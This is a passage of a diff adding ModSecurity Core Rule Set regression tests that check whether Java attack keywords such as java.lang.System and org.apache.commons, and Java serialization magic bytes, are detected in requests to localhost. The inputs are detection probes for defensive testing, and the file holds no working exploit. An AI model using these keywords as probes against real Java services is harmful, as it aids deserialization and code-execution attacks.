+ dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-376 + desc: "Cookie test includes keyword 
java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-377 + desc: "Cookie name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.System=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-378 + desc: "Request header test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-379 + desc: "XML attribute value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" 
+ port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-380 + desc: "XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-381 + desc: "Nested XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-382 + desc: "Content-Type text/plain includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-383 + desc: "Content-Type application/json arg value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.System\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-384 + desc: "Content-Type application/json arg name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.System\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-385 + desc: "Argument test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-386 + desc: "Argument name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-387 + desc: "Cookie test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=javax.script.ScriptEngineManager + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-388 + desc: "Cookie name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: javax.script.ScriptEngineManager=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-389 + desc: "Request header test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: javax.script.ScriptEngineManager + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-390 + desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-391 + desc: "XML element value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-392 + desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-393 + desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-394 + desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"javax.script.ScriptEngineManager\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-395 + desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"javax.script.ScriptEngineManager\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-396 + desc: "Argument test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-397 + desc: "Argument name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-398 + desc: "Cookie test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.apache.commons + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-399 + desc: "Cookie name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.apache.commons=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-400 + desc: "Request header test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.apache.commons + method: "POST" + version: "HTTP/1.0" + data: 
"test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-401 + desc: "XML attribute value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-402 + desc: "XML element value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-403 + desc: "Nested XML element value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-404 + desc: "Content-Type text/plain includes keyword org.apache.commons" + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-405 + desc: "Content-Type application/json arg value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"org.apache.commons\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-406 + desc: "Content-Type application/json arg name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"org.apache.commons\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-407 + desc: "Argument test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-408 + desc: "Argument name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-409 + desc: "Cookie test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.omg.CORBA + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-410 + desc: "Cookie name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.omg.CORBA=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-411 + desc: "Request header test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.omg.CORBA + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-412 + desc: "XML attribute value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-413 + desc: "XML element value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-414 + desc: "Nested XML element value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-415 + desc: "Content-Type text/plain includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-416 + desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"org.omg.CORBA\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-417 + desc: 
"Content-Type application/json arg name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"org.omg.CORBA\": \"test\"}" + output: + log_contains: "id \"944130\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml new file mode 100644 index 000000000..8ff2417c9 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml 
@@ -0,0 +1,28 @@
+---
+meta:
+ author: "spartantri"
+ enabled: true
+ name: "944200.yaml"
+ description: "Description"
+tests:
+ - test_title: 944200-0FP
+ desc: Argument test includes java serialization magic bytes, raw request
+ stages:
+ - stage:
+ input:
+ stop_magic: true
+ dest_addr: "127.0.0.1"
+ port: 80
+ raw_request: "POST / HTTP/1.0\r\nHost: localhost\r\nUser-Agent: ModSecurity CRS 3 Tests\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: en-us,en;q=0.5\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9\r\n\r\ntest=¬í\0\x05\r\n\r\n"
+ output:
+ no_log_contains: "id \"944200\""
+ - test_title: 944200-1
+ desc: Argument test includes java serialization magic bytes, base64 encoded request
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ encoded_request: "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"
+ output:
+ log_contains: "id \"944200\""
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
new file mode 100644
index 000000000..b545ef09e
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
